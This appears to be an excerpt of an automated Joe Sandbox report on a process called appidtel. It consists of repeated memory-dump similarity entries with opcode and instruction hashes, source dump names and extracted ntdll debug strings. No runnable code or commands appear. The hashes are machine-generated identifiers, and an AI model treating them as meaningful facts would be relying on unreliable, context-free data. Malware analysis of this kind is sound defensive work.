                                          • Opcode Fuzzy Hash: 6e1f0398aa146a770f261bacf395da1b5d619b88ff966f9b7f54ffaa1c222479
                                          • Instruction Fuzzy Hash: 5290022170140802D102B15844146060009C7E1345F95C013F5424955E8B258E53A536
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0af6a407b3101aeea0b1b10c12c505a772074f80f868771f94bc2af9a683f38b
                                          • Instruction ID: 1faf4c6e55554890fff70b560d0cca72cf4ffb866d3527fa917ebf5357bb74ce
                                          • Opcode Fuzzy Hash: 0af6a407b3101aeea0b1b10c12c505a772074f80f868771f94bc2af9a683f38b
                                          • Instruction Fuzzy Hash: 5690026170180803D140B55848046070005C7E0302F55C012B6064955F8F298D516539
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2973f5ae996499a8d4ece0c3750910fa7f6255676b7b05903545d855f12485a1
                                          • Instruction ID: 296eaf80706d9cec9fc55f1696297e87bce54ae49fcfdb2ca078b694e1c5d7d7
                                          • Opcode Fuzzy Hash: 2973f5ae996499a8d4ece0c3750910fa7f6255676b7b05903545d855f12485a1
                                          • Instruction Fuzzy Hash: 0B900221B0140902D101B1584404616000AC7E0241F95C023B5024955FCF258E92A535
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f2c79734c22c0a5ca7ff5dcb7a8fdb47172b7ac4741419be29cc179dc28da544
                                          • Instruction ID: 7a81313a9183fbc52f3bcf4cf26b7b889f0290d3844d6657f35c7ba0cc5a262c
                                          • Opcode Fuzzy Hash: f2c79734c22c0a5ca7ff5dcb7a8fdb47172b7ac4741419be29cc179dc28da544
                                          • Instruction Fuzzy Hash: E690027170140802D140B15844047460005C7E0301F55C012B9064954F8B598ED56A69
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ef45ea7f8727468277465e3eeb5d2a67fd8a40c82f1865d450d63b639e34ea73
                                          • Instruction ID: 8023456a0de13456607ec035df94a1a52b0859e05a87c023b2272931b9f2785b
                                          • Opcode Fuzzy Hash: ef45ea7f8727468277465e3eeb5d2a67fd8a40c82f1865d450d63b639e34ea73
                                          • Instruction Fuzzy Hash: 7890023570140802D510B15858046460046C7E0301F55D412B4424958E8B548DA1A525
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ac469689d503d5a888627bedabe155d02a7818e02d8d1c39a98909f305a5174c
                                          • Instruction ID: b246b188ebbc1c926b4c5cc93cc7a214a5d05610cbd0673c1bcbb6b757bef5e1
                                          • Opcode Fuzzy Hash: ac469689d503d5a888627bedabe155d02a7818e02d8d1c39a98909f305a5174c
                                          • Instruction Fuzzy Hash: 5890022170544842D100B5585408A060005C7E0205F55D012B5064995ECB358D51A535
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3a0881a680f63cd2c01baca33e4f90199fa6a4b3f80fcc1940268a91b29137b1
                                          • Instruction ID: 5f03cb128001f9d9c6fb073dbba03a1de2b86fef8a47571b2c1fc8ca92e49c63
                                          • Opcode Fuzzy Hash: 3a0881a680f63cd2c01baca33e4f90199fa6a4b3f80fcc1940268a91b29137b1
                                          • Instruction Fuzzy Hash: F190022971340402D180B158540860A0005C7E1202F95D416B4015958DCF158D695725
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1b31c52ab1d075bac67c02b1df975adb26f18ef24cdb5fe88634f7dc1c1a308e
                                          • Instruction ID: efc94e09f9b4b2d6ca2ecb41d5f53737b9bae9959c464e333bb892a5e3587677
                                          • Opcode Fuzzy Hash: 1b31c52ab1d075bac67c02b1df975adb26f18ef24cdb5fe88634f7dc1c1a308e
                                          • Instruction Fuzzy Hash: 51900231702405429540B2585804A4E4105C7F1302B95D416B4015954DCF148D615625
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0ac8af460623f78d69fa322a24b7369b0afcf31da27585120e9bbc4a501dcdc0
                                          • Instruction ID: 2823eba86a7d063dca1b673916af36fbda17889606bb39909ae00c4b724d7da6
                                          • Opcode Fuzzy Hash: 0ac8af460623f78d69fa322a24b7369b0afcf31da27585120e9bbc4a501dcdc0
                                          • Instruction Fuzzy Hash: F590043170140403D140F15C541C7074005D7F1301F55D013F4414D54DDF15CD575737
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cc1c04666dc17828e316bd7bd0fc1390bf917e8a782370d5c9a3ccc04f0cadab
                                          • Instruction ID: ec3ea3564ee9ad940a11cb4bf87ee7fb982e58635ca6e2a77366258cb1a501b9
                                          • Opcode Fuzzy Hash: cc1c04666dc17828e316bd7bd0fc1390bf917e8a782370d5c9a3ccc04f0cadab
                                          • Instruction Fuzzy Hash: 74900221742445525545F15844045074006D7F0241795C013B5414D50D8B269D56DA25
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0f49e5fe4a367a8fcfe0e6daebd1c49db7e3b2bbb46156db6d8b1dfeb1b7e01f
                                          • Instruction ID: e5dd0837c6487212842d2e1b7669982bad98f77bfcaf12b10c7aaabc52f7a3dd
                                          • Opcode Fuzzy Hash: 0f49e5fe4a367a8fcfe0e6daebd1c49db7e3b2bbb46156db6d8b1dfeb1b7e01f
                                          • Instruction Fuzzy Hash: 6C90023174140802D141B15844046060009D7E0241F95C013B4424954F8B558F56AE65
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7a7f36fcbd5cd6c6b0df23b76067bf39e2894ce08342df3c4ec48726dcc1d20e
                                          • Instruction ID: e65c1654f50f251056c38c5db84aed96a16cc143976a7325b2c8ca2d099a8db5
                                          • Opcode Fuzzy Hash: 7a7f36fcbd5cd6c6b0df23b76067bf39e2894ce08342df3c4ec48726dcc1d20e
                                          • Instruction Fuzzy Hash: 8690023170140C42D100B1584404B460005C7F0301F55C017B4124A54E8B15CD517925
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 10bad2891755d3fe0b9d55f97ce856f38beedc4c3849020e3ff7e8cf9c9f9ae0
                                          • Instruction ID: bf51dd2b5245f12e665bd53c0666b87e5fb6185d5cac3bf6d50832e7c7d9051e
                                          • Opcode Fuzzy Hash: 10bad2891755d3fe0b9d55f97ce856f38beedc4c3849020e3ff7e8cf9c9f9ae0
                                          • Instruction Fuzzy Hash: B5900221B0540802D140B15854187060015C7E0201F55D012B4024954ECB598F556AA5
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c6a23f38d6330ec8e9560b7e2c9e6e7dd7495b6f7f8a7d853b31f8c5f88588f1
                                          • Instruction ID: 57bdf12c822315b2f8cf3eee6a82904077745bb714779912090569b3afed6c78
                                          • Opcode Fuzzy Hash: c6a23f38d6330ec8e9560b7e2c9e6e7dd7495b6f7f8a7d853b31f8c5f88588f1
                                          • Instruction Fuzzy Hash: 6090023170140803D100B15855087070005C7E0201F55D412B4424958EDB568D516525
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9f2fb2cba426d77f7a38f060cc557f96166544f601460300a78c3af9c9005fdb
                                          • Instruction ID: d4b2143864469e8cad8e8398510902884263dea5e3500c66a42791a8016039d9
                                          • Opcode Fuzzy Hash: 9f2fb2cba426d77f7a38f060cc557f96166544f601460300a78c3af9c9005fdb
                                          • Instruction Fuzzy Hash: 2A90023170140802D100B59854086460005C7F0301F55D012B9024955FCB658D916535
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                          • Instruction ID: 91682871aa46af200ffdb14a75fd42d57079b4b62a80281a55f3e5fc31b56b94
                                          • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                          • Instruction Fuzzy Hash:
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                          • API String ID: 48624451-2108815105
                                          • Opcode ID: a3d324de83c355e43eb668f32bca74fab0ed3dd60fafd1b24eff6bc63f2a8a57
                                          • Instruction ID: 25ced5a3b40fb80367fdbe1da787e7fc59e8f31086758d89b67cae881638bbf4
                                          • Opcode Fuzzy Hash: a3d324de83c355e43eb668f32bca74fab0ed3dd60fafd1b24eff6bc63f2a8a57
                                          • Instruction Fuzzy Hash: 2751D6B6A00116AFDB10DB98889097FFBB8BB09240754867BF465DB741D374DE508BA8
                                          Strings
                                          • Execute=1, xrefs: 03474713
                                          • ExecuteOptions, xrefs: 034746A0
                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 034746FC
                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03474725
                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03474742
                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 03474787
                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03474655
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                          • API String ID: 0-484625025
                                          • Opcode ID: 32aa99f4ef060ba1fdbc72ce6088d25317a6e3ba60c1359f7f2be8f4bc9a9e9b
                                          • Instruction ID: f655c064bfc2568e2a6cd9048ee8d2f04ad30a487d29c6597117f4346191b588
                                          • Opcode Fuzzy Hash: 32aa99f4ef060ba1fdbc72ce6088d25317a6e3ba60c1359f7f2be8f4bc9a9e9b
                                          • Instruction Fuzzy Hash: E75139B5A403196EDB10EBA5EC95FFE7BA8EB09310F0400AFD505AF290D7709A458B58
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID: __aulldvrm
                                          • String ID: +$-$0$0
                                          • API String ID: 1302938615-699404926
                                          • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                          • Instruction ID: eec78eb6c2c870318773882f6143d1fe98e28209c4373ee1db0bc4665ad3f2f8
                                          • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                          • Instruction Fuzzy Hash: 5F81AE34E052499EFF24CF68C9917AEBBA6EF45320F1C416BD8E1AF390C634C8418B59
                                          Strings
                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 034702BD
                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 034702E7
                                          • RTL: Re-Waiting, xrefs: 0347031E
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                          • API String ID: 0-2474120054
                                          • Opcode ID: 6b5a6948a0a7379d2753aecc149b39c9e923a138483ec1500c282d919b780d17
                                          • Instruction ID: 83ae744e303a8763da7a6f3b023439a1e8b13053d58ba1b3f89f986e860474e4
                                          • Opcode Fuzzy Hash: 6b5a6948a0a7379d2753aecc149b39c9e923a138483ec1500c282d919b780d17
                                          • Instruction Fuzzy Hash: 76E19A316047419FD724CF28C884B6ABBE0FB84714F980A6EF5A59F3A1D774D849CB4A
                                          Strings
                                          • RTL: Resource at %p, xrefs: 03477B8E
                                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03477B7F
                                          • RTL: Re-Waiting, xrefs: 03477BAC
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                          • API String ID: 0-871070163
                                          • Opcode ID: d8ef58b90263f5a002a417e09c35643c0d6f196273a6649a7f82a3f05a791227
                                          • Instruction ID: f6c5f72fa28d7bd28bcb4fa755a23b22d79d8e12d3ab053b601ee25b39f0c0f5
                                          • Opcode Fuzzy Hash: d8ef58b90263f5a002a417e09c35643c0d6f196273a6649a7f82a3f05a791227
                                          • Instruction Fuzzy Hash: 0541CF357017029FD724DE29D840B6BB7E5EB89724F040A2EE96ADF780DB31E4058B99
                                          APIs
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0347728C
                                          Strings
                                          • RTL: Resource at %p, xrefs: 034772A3
                                          • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03477294
                                          • RTL: Re-Waiting, xrefs: 034772C1
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                          • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                          • API String ID: 885266447-605551621
                                          • Opcode ID: 3ea332862cc279824f586c9c4cacd0b571ff99ec85b6ba782ccd4ed6283ef1a5
                                          • Instruction ID: be755ea2ac4d3b4e77b46a9e009ad8717d58aab9bb66b3a37fbfbb550a8bd100
                                          • Opcode Fuzzy Hash: 3ea332862cc279824f586c9c4cacd0b571ff99ec85b6ba782ccd4ed6283ef1a5
                                          • Instruction Fuzzy Hash: 2741F035700206AFD720DE25CC41FAABBA5FF99710F140A1AF965AF380DB21E80687D9
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID: __aulldvrm
                                          • String ID: +$-
                                          • API String ID: 1302938615-2137968064
                                          • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                          • Instruction ID: 91b8bbb0feab9b6da61e33b5c140cb8d3ebc870eb4f9210ec780652b94db9b48
                                          • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                          • Instruction Fuzzy Hash: 1A917370E003159EFB24DE69C8816BFBBA5AF44720F68463BE875AF3C0D73499428758
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $$@
                                          • API String ID: 0-1194432280
                                          • Opcode ID: c24a89b0086f87d5e32bd385ee54f37be05a43a5fc732713fca88ad58a101ccd
                                          • Instruction ID: 2b1da36076f1a9f5bda277a2baabbb098a0ee2ee9b2d3fe690a33689994254bb
                                          • Opcode Fuzzy Hash: c24a89b0086f87d5e32bd385ee54f37be05a43a5fc732713fca88ad58a101ccd
                                          • Instruction Fuzzy Hash: A5813975E012699FDB31DF54CC44BEAB6B8AB08710F0445EBE919BB290D7709E80CFA5
                                          APIs
                                          • @_EH4_CallFilterFunc@8.LIBCMT ref: 0348CFBD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID: CallFilterFunc@8
                                          • String ID: @$@4Qw@4Qw
                                          • API String ID: 4062629308-2383119779
                                          • Opcode ID: fd0b063fd149a54f00eefa291ecc9e85cf1fa75880c9dc3054c35eca162d3e17
                                          • Instruction ID: c99a89dcc278786dcc9f0c41e24c51d4bfbf7da09ab8aabf69c179de3276c69a
                                          • Opcode Fuzzy Hash: fd0b063fd149a54f00eefa291ecc9e85cf1fa75880c9dc3054c35eca162d3e17
                                          • Instruction Fuzzy Hash: 73419D75D00614DEDB21EFA6C840AAEFBB8EF46704F14402BE914EF294D774C901CB69